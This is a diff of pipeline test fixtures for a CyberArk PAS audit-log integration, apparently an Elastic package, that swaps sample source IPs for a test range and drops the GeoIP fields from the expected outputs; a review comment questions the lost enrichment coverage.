@@ -925,8 +769,8 @@ "event": { "severity": 2, "action": "add group member", - "ingested": "2021-06-09T10:24:29.730116300Z", - "original": "\u003c5\u003e1 2021-03-14T12:57:21Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:21\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:21Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e265\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd Group Member\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAdd Group Member\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMP_ADB_AppUsers\u003c/SourceUser\u003e\\n \u003cTargetUser\u003ePSMP_ADB_asr-cyberark-psm-ssh\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd Group Member\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:57:21\",\"IsoTimestamp\":\"2021-03-14T12:57:21Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group 
Member\",\"SourceUser\":\"PSMP_ADB_AppUsers\",\"TargetUser\":\"PSMP_ADB_asr-cyberark-psm-ssh\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:42.577535700Z", + "original": "\u003c5\u003e1 2021-03-14T12:57:21Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:21\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:21Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e265\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd Group Member\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAdd Group Member\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMP_ADB_AppUsers\u003c/SourceUser\u003e\\n \u003cTargetUser\u003ePSMP_ADB_asr-cyberark-psm-ssh\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd Group Member\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 
05:57:21\",\"IsoTimestamp\":\"2021-03-14T12:57:21Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PSMP_ADB_AppUsers\",\"TargetUser\":\"PSMP_ADB_asr-cyberark-psm-ssh\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", "code": "265", "kind": "event" } diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-266-remove-group-member.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-266-remove-group-member.log index 7b0f9be88a0..85ca20fc3cb 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-266-remove-group-member.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-266-remove-group-member.log 
@@ -1,2 +1,2 @@
-<5>1 2021-03-10T17:59:48Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:48","IsoTimestamp":"2021-03-10T17:59:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"266","Desc":"Remove Group Member","Severity":"Info","Issuer":"Administrator","Action":"Remove Group Member","SourceUser":"PSMMaster","TargetUser":"Administrator","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Remove Group Member","GatewayStation":""}}}
-<5>1 2021-03-10T22:19:23Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:23","IsoTimestamp":"2021-03-10T22:19:23Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"266","Desc":"Remove Group Member","Severity":"Info","Issuer":"Administrator","Action":"Remove Group Member","SourceUser":"PSMMaster","TargetUser":"Administrator","Safe":"","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Remove Group Member","GatewayStation":""}}}
+<5>1 2021-03-10T17:59:48Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:48","IsoTimestamp":"2021-03-10T17:59:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"266","Desc":"Remove Group Member","Severity":"Info","Issuer":"Administrator","Action":"Remove Group Member","SourceUser":"PSMMaster","TargetUser":"Administrator","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Remove Group Member","GatewayStation":""}}}
+<5>1 2021-03-10T22:19:23Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 
14:19:23","IsoTimestamp":"2021-03-10T22:19:23Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"266","Desc":"Remove Group Member","Severity":"Info","Issuer":"Administrator","Action":"Remove Group Member","SourceUser":"PSMMaster","TargetUser":"Administrator","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Remove Group Member","GatewayStation":""}}}
diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-266-remove-group-member.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-266-remove-group-member.log-expected.json
index a67253c91df..ef28e482a25 100644
--- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-266-remove-group-member.log-expected.json
+++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-266-remove-group-member.log-expected.json
@@ -7,20 +7,8 @@
 }
 },
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "address": "81.32.170.205",
- "ip": "81.32.170.205"
+ "address": "67.43.156.13",
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -37,7 +25,7 @@
 },
 "related": {
 "ip": [
- "81.32.170.205"
+ "67.43.156.13"
 ]
 },
 "cyberarkpas": {
@@ -45,7 +33,7 @@
 "severity": "Info",
 "rfc5424": true,
 "iso_timestamp": "2021-03-10T17:59:48Z",
- "station": "81.32.170.205",
+ "station": "67.43.156.13",
 "action": "Remove Group Member",
 "target_user": "Administrator",
 "source_user": "PSMMaster",
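Review bot: The regenerated expectation in the `@@ -7,20 +7,8 @@` hunk drops the whole `source.geo` object for 67.43.156.13, so these fixtures no longer assert that the geoip processor enriches `source.ip` at all, whereas the old fixture pinned a concrete lookup result. If the move to the supported subset was meant to keep GeoIP enrichment deterministic rather than remove it, the absence of any geo field suggests the lookup did not hit during regeneration, which is worth confirming against the test GeoIP database before accepting the new expectation. The same drop appears in the `@@ -74,19 +62,8 @@` hunk for 67.43.156.14 and in the `@@ -7,20 +7,8 @@` hunk of test-273-remove-owner.log-expected.json. If no enrichment is expected for this range, a sentence in the PR description saying so would save the next reader the same question.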
@@ -61,8 +49,8 @@ "event": { "severity": 2, "action": "remove group member", - "ingested": "2021-06-09T10:24:30.061938500Z", - "original": "\u003c5\u003e1 2021-03-10T17:59:48Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:59:48\",\"IsoTimestamp\":\"2021-03-10T17:59:48Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"266\",\"Desc\":\"Remove Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Remove Group Member\",\"SourceUser\":\"PSMMaster\",\"TargetUser\":\"Administrator\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Remove Group Member\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:43.685157200Z", + "original": "\u003c5\u003e1 2021-03-10T17:59:48Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:59:48\",\"IsoTimestamp\":\"2021-03-10T17:59:48Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"266\",\"Desc\":\"Remove Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Remove Group Member\",\"SourceUser\":\"PSMMaster\",\"TargetUser\":\"Administrator\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Remove Group Member\",\"GatewayStation\":\"\"}}}", "code": "266", "kind": "event" } 
@@ -74,19 +62,8 @@
 }
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-VA",
- "country_name": "United States",
- "region_name": "Virginia",
- "location": {
- "lon": -77.2481,
- "lat": 38.6583
- },
- "country_iso_code": "US"
- },
- "address": "35.192.121.42",
- "ip": "35.192.121.42"
+ "address": "67.43.156.14",
+ "ip": "67.43.156.14"
 },
 "tags": [
 "preserve_original_event"
@@ -103,7 +80,7 @@
 },
 "related": {
 "ip": [
- "35.192.121.42"
+ "67.43.156.14"
 ]
 },
 "cyberarkpas": {
@@ -111,7 +88,7 @@
 "severity": "Info",
 "rfc5424": true,
 "iso_timestamp": "2021-03-10T22:19:23Z",
- "station": "35.192.121.42",
+ "station": "67.43.156.14",
 "action": "Remove Group Member",
 "target_user": "Administrator",
 "source_user": "PSMMaster",
@@ -127,8 +104,8 @@ "event": { "severity": 2, "action": "remove group member", - "ingested": "2021-06-09T10:24:30.061959300Z", - "original": "\u003c5\u003e1 2021-03-10T22:19:23Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:19:23\",\"IsoTimestamp\":\"2021-03-10T22:19:23Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"266\",\"Desc\":\"Remove Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Remove Group Member\",\"SourceUser\":\"PSMMaster\",\"TargetUser\":\"Administrator\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"35.192.121.42\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Remove Group Member\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:43.685166800Z", + "original": "\u003c5\u003e1 2021-03-10T22:19:23Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:19:23\",\"IsoTimestamp\":\"2021-03-10T22:19:23Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"266\",\"Desc\":\"Remove Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Remove Group Member\",\"SourceUser\":\"PSMMaster\",\"TargetUser\":\"Administrator\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Remove Group Member\",\"GatewayStation\":\"\"}}}", "code": "266", "kind": "event" } diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-273-remove-owner.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-273-remove-owner.log index ea1458e5874..6a20dacc257 100644 
--- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-273-remove-owner.log
+++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-273-remove-owner.log
@@ -1 +1 @@
-<5>1 2021-03-10T17:59:33Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:33","IsoTimestamp":"2021-03-10T17:59:33Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"273","Desc":"Remove Owner","Severity":"Info","Issuer":"Administrator","Action":"Remove Owner","SourceUser":"Administrator","TargetUser":"","Safe":"PSMSessions","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Remove Owner","GatewayStation":""}}}
+<5>1 2021-03-10T17:59:33Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:33","IsoTimestamp":"2021-03-10T17:59:33Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"273","Desc":"Remove Owner","Severity":"Info","Issuer":"Administrator","Action":"Remove Owner","SourceUser":"Administrator","TargetUser":"","Safe":"PSMSessions","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Remove Owner","GatewayStation":""}}}
diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-273-remove-owner.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-273-remove-owner.log-expected.json
index db754282a1a..82d2016ad8d 100644
--- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-273-remove-owner.log-expected.json
+++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-273-remove-owner.log-expected.json
@@ -7,20 +7,8 @@
 }
 },
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "address": "81.32.170.205",
- "ip": "81.32.170.205"
+ "address": "67.43.156.13",
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -37,7 +25,7 @@
 },
 "related": {
 "ip": [
- "81.32.170.205"
+ "67.43.156.13"
 ]
 },
 "cyberarkpas": {
@@ -46,7 +34,7 @@
 "rfc5424": true,
 "iso_timestamp": "2021-03-10T17:59:33Z",
 "safe": "PSMSessions",
- "station": "81.32.170.205",
+ "station": "67.43.156.13",
 "action": "Remove Owner",
 "source_user": "Administrator",
 "message": "Remove Owner",
@@ -61,8 +49,8 @@ "event": { "severity": 2, "action": "remove owner", - "ingested": "2021-06-09T10:24:30.109364900Z", - "original": "\u003c5\u003e1 2021-03-10T17:59:33Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:59:33\",\"IsoTimestamp\":\"2021-03-10T17:59:33Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"273\",\"Desc\":\"Remove Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Remove Owner\",\"SourceUser\":\"Administrator\",\"TargetUser\":\"\",\"Safe\":\"PSMSessions\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Remove Owner\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:43.869926900Z", + "original": "\u003c5\u003e1 2021-03-10T17:59:33Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:59:33\",\"IsoTimestamp\":\"2021-03-10T17:59:33Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"273\",\"Desc\":\"Remove Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Remove Owner\",\"SourceUser\":\"Administrator\",\"TargetUser\":\"\",\"Safe\":\"PSMSessions\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Remove Owner\",\"GatewayStation\":\"\"}}}", "code": "273", "kind": "event" } diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-278-add-rule.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-278-add-rule.log-expected.json index 87c3b6113c7..f942646255c 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-278-add-rule.log-expected.json 
+++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-278-add-rule.log-expected.json 
@@ -55,7 +55,7 @@ "event": { "severity": 2, "action": "add rule", - "ingested": "2021-06-09T10:24:30.135488100Z", + "ingested": "2021-12-09T13:36:43.972786Z", "original": "\u003c5\u003e1 2021-03-11T18:01:14Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 10:01:14\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T18:01:14Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e278\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd Rule\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePVWAAppUser\u003c/Issuer\u003e\\n \u003cAction\u003eAdd Rule\u003c/Action\u003e\\n \u003cSourceUser\u003eAdministrator\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMUnmanagedSessionAccounts\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\2\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eAllow\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd Rule\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 10:01:14\",\"IsoTimestamp\":\"2021-03-11T18:01:14Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"278\",\"Desc\":\"Add Rule\",\"Severity\":\"Info\",\"Issuer\":\"PVWAAppUser\",\"Action\":\"Add 
Rule\",\"SourceUser\":\"Administrator\",\"TargetUser\":\"\",\"Safe\":\"PSMUnmanagedSessionAccounts\",\"File\":\"Root\\\\2\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"Allow\",\"ExtraDetails\":\"\",\"Message\":\"Add Rule\",\"GatewayStation\":\"\"}}}", "code": "278", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-288-auto-clear-users-history-start.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-288-auto-clear-users-history-start.log-expected.json index b82232f003d..73b2242f20c 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-288-auto-clear-users-history-start.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-288-auto-clear-users-history-start.log-expected.json @@ -47,7 +47,7 @@ "event": { "severity": 2, "action": "auto clear users history start", - "ingested": "2021-06-09T10:24:30.162223800Z", + "ingested": "2021-12-09T13:36:44.088513500Z", "original": "\u003c5\u003e1 2021-03-05T11:00:06Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 05 03:00:06\",\"IsoTimestamp\":\"2021-03-05T11:00:06Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"288\",\"Desc\":\"Auto Clear Users History start\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Auto Clear Users History start\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Auto Clear Users History start\",\"GatewayStation\":\"\"}}}", "code": "288", "kind": "event" 
@@ -90,7 +90,7 @@ "event": { "severity": 2, "action": "auto clear users history start", - "ingested": "2021-06-09T10:24:30.162256200Z", + "ingested": "2021-12-09T13:36:44.088521700Z", "original": "Mar 08 03:00:20 VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"288\",\"Desc\":\"Auto Clear Users History start\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Auto Clear Users History start\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Auto Clear Users History start\",\"GatewayStation\":\"\"}}}", "code": "288", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-289-auto-clear-users-history-end.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-289-auto-clear-users-history-end.log-expected.json index a35f6c5a9a8..b9c3b31e63d 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-289-auto-clear-users-history-end.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-289-auto-clear-users-history-end.log-expected.json 
@@ -47,7 +47,7 @@ "event": { "severity": 2, "action": "auto clear users history end", - "ingested": "2021-06-09T10:24:30.203966100Z", + "ingested": "2021-12-09T13:36:44.255396Z", "original": "\u003c5\u003e1 2021-03-05T11:00:06Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 05 03:00:06\",\"IsoTimestamp\":\"2021-03-05T11:00:06Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"289\",\"Desc\":\"Auto Clear Users History end\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Auto Clear Users History end\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Auto Clear Users History end\",\"GatewayStation\":\"\"}}}", "code": "289", "kind": "event" @@ -90,7 +90,7 @@ "event": { "severity": 2, "action": "auto clear users history end", - "ingested": "2021-06-09T10:24:30.203981100Z", + "ingested": "2021-12-09T13:36:44.255404400Z", "original": "Mar 08 03:00:20 VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"289\",\"Desc\":\"Auto Clear Users History end\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Auto Clear Users History end\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Auto Clear Users History end\",\"GatewayStation\":\"\"}}}", "code": "289", "kind": "event" 
diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-290-auto-clear-safes-history-start.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-290-auto-clear-safes-history-start.log-expected.json index 7cac2b02e77..2dba10224d3 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-290-auto-clear-safes-history-start.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-290-auto-clear-safes-history-start.log-expected.json @@ -47,7 +47,7 @@ "event": { "severity": 2, "action": "auto clear safes history start", - "ingested": "2021-06-09T10:24:30.239578300Z", + "ingested": "2021-12-09T13:36:44.417420500Z", "original": "\u003c5\u003e1 2021-03-09T09:00:47Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 09 01:00:47\",\"IsoTimestamp\":\"2021-03-09T09:00:47Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"290\",\"Desc\":\"Auto Clear Safes History start\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Auto Clear Safes History 